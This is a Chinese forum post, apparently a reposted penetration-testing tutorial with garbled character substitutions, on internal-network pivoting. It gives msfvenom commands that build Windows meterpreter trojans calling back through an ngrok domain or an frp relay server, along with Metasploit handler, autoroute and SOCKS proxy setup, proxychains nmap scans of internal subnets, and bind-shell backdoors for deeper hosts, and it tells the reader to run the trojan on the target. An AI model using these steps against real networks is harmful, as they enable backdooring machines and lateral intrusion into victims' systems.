内网安全:Socks 署理 || 本地署理 技能.

打印 上一主题 下一主题

主题 870|帖子 870|积分 2610

内网安全:Socks 署理 || 本地署理 技能.

Socks 署理又称万能署理,就像有很多跳线的转接板,它只是简朴地将一端的系统连接到别的一端。支持多种协议,包括http、ftp哀求及其它范例的哀求。它分socks 4 和socks 5两种范例,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.


目录:

内网安全:Socks 署理 技能.
两个内网通讯上线( Ngrok )
(1)开通隧道:
(2)下载客户端:
(3)生成一个步伐后门:
(4)进行监听:(kali)
两个内网通讯上线( Frp 自建跳板 )
(1)跳板情况搭建:
(2)生成步伐背面:
(3)进行监听:(kali)
本地署理:( MSF 跳板多个内网主机系列)
第二层内网署理:
(1)信息收集及配置访问:
(2)开启本地署理:
(3)内网扫描:
(4)浏览器访问:
第三层内网署理:
(1)生成正向步伐后门:
(2)进行监听:
(3)信息收集及配置访问:
(4)开启本地署理:
第四层内网渗出:
(1)生成正向步伐后门:
 (2)进行监听:

  1. 代理解决的问题:(1)内网有外网    (2)内网有过滤    (3)内网无外网
复制代码

两个内网通讯上线( Ngrok )

  1. 开通隧道工具:https://www.ngrok.cc/user.html
复制代码
  1. 理解:二个内网主机不能相互连接的,这样就可以通过开通的隧道进行连接.
  2. (开通的隧道就是在外网开通一个域名:当目标访问这个域名,则会将数据返还回来到kali中)
复制代码
(1)开通隧道:





(2)下载客户端:



  1. 解压放到 kali 中:(切换的刚刚下载的文件目录中)
  2. (1)./sunny clientid 115735315695        // 执行
  3.     ./sunny clientid 隧道的IP
复制代码



(3)生成一个步伐后门:(木马)

  1. msfvenom -p windows/meterpreter/reverse_http lhost=bgxg.free.idcfengye.com lport=80 -f exe -o bgxg.exe
复制代码


(4)进行监听:(kali)

  1. (1)msfconsole
  2. (2)use exploit/multi/handler
  3. (3)set payload windows/meterpreter/reverse_http
  4. (4)set lhost 192.168.0.106        // 本地的 IP 地址
  5. (5)set lport 4444                 // 本地的 端口.
  6. (6)exploit
复制代码


两个内网通讯上线( Frp 自建跳板 )

(1)跳板情况搭建:

  1. 需要有自己的服务器,有来搭建跳板.
复制代码
  1. 【服务器 和 控制端】需要下载的工具:https://github.com/fatedier/frp/releases
复制代码

  1. 服务器修改配置文件 frps.ini:
  2. [common]
  3. bind_port = 6677            // 这个端口修改为 服务器 开放的就行
  4. 启动服务端:【切换在下载的目录并执行】
  5. ./frps -c ./frps.ini
复制代码
  1. 控制端修改配置文件 frpc.ini:
  2. [common]
  3. server_addr = 云主机 IP 地址
  4. server_port = 6677                 // frpc 工作端口,必须和上面 frps 保持一致
  5. [msf]
  6. type = tcp
  7. local_ip = 127.0.0.1
  8. local_port = 5555                  // 转发给本机的 5555
  9. remote_port = 6000                 // 服务端用 6000 端口转发给本机
  10. 启动客户端:【切换在下载的目录并执行】
  11. ./frpc -c ./frpc.ini
复制代码

(2)生成步伐背面:(木马)

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=服务器(公网)的IP地址 lport=6000 -f exe -o frp.exe
复制代码


(3)进行监听:(kali)

  1. (1)msfconsole
  2. (2)use exploit/multi/handler
  3. (3)set payload windows/meterpreter/reverse_tcp
  4. (4)set LHOST 127.0.0.1   
  5. (5)set LPORT 5555        // 本机监听的端口【和控制端的一样】
  6. (6)exploit
  7. 然后把程序后门(木马)放在目标主机上执行就行.
复制代码

本地署理:( MSF 跳板多个内网主机系列)

第二层内网署理:

(1)信息收集及配置访问:

  1. (1)run get_local_subnets            // 获取网络接口
  2. (2)run autoroute -p                 // 查看路由地址
  3. (3)run autoroute -s 10.0.20.0/24    // 添加地二层内网的路由网段.
  4. (3)run post/multi/manage/autoroute        // 自动添加,目前所有路由网段
复制代码


(2)开启本地署理:

  1. background                            // 挂起会话
  2. 如果是msf6,使用代理模板为:
  3. use auxiliary/server/socks_proxy
  4. 如果是msf5,使用代理模板为:
  5. use auxiliary/server/socks4a
复制代码
  1. (1)set srvport 2222        // 设置本地代理端口为2222
  2. (2)exploit                 // 运行
复制代码


(3)内网扫描:

  1. 打开 /etc/proxychains4.conf 文件:
  2. socks4 192.168.0.106 2222                // 添加 本地的代理和端口
复制代码

  1. 进行扫描:
  2. proxychains4 nmap -sT -Pn 10.0.20.0/24 -p 80
  3. -Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护.
  4. -sT:扫描 TCP 数据包已建立的连接 connect
复制代码



(4)浏览器访问:




第三层内网署理:

(1)生成正向步伐后门:

  1. msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=54321 -f exe > 54321.exe
复制代码


(2)进行监听:

  1. 要在和上面一样的 msf 会话中执行.
  2. (1)use exploit/multi/handler   
  3. (2)set payload windows/x64/meterpreter/bind_tcp
  4. (3)set rhost 10.0.20.99                // 第二层内网的 IP 地址
  5. (4)set lport 54321                     // 和程序后面(木马)一样的端口
  6. (5)exploit
复制代码


(3)信息收集及配置访问:

  1. (1)run get_local_subnets            // 获取网络接口
  2. (2)run autoroute -p                 // 查看路由地址
  3. (3)run post/multi/manage/autoroute        // 自动添加,目前所有路由网段.
复制代码


(4)开启本地署理:

  1. background                            // 挂起会话
  2. 如果是msf6,使用代理模板为:
  3. use auxiliary/server/socks_proxy
  4. 如果是msf5,使用代理模板为:
  5. use auxiliary/server/socks4a
复制代码

  1. (1)set srvport 6666        // 默认端口6666
  2. (2)exploit                 // 运行
复制代码


第四层内网渗出:

(1)生成正向步伐后门:

  1. msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9876 -f exe > 9876.exe
复制代码


 (2)进行监听:

  1. 要在和上面一样的 msf 会话中执行.
  2. (1)use exploit/multi/handler   
  3. (2)set payload windows/x64/meterpreter/bind_tcp
  4. (3)set rhost 10.0.10.110                // 第二层内网的 IP 地址
  5. (4)set lport 9876                     // 和程序后面(木马)一样的端口
  6. (5)exploit
复制代码

      
     
   
学习链接:第70天:内网安全-域横向内网周游Socks署理隧道技能_哔哩哔哩_bilibili


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

万有斥力

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表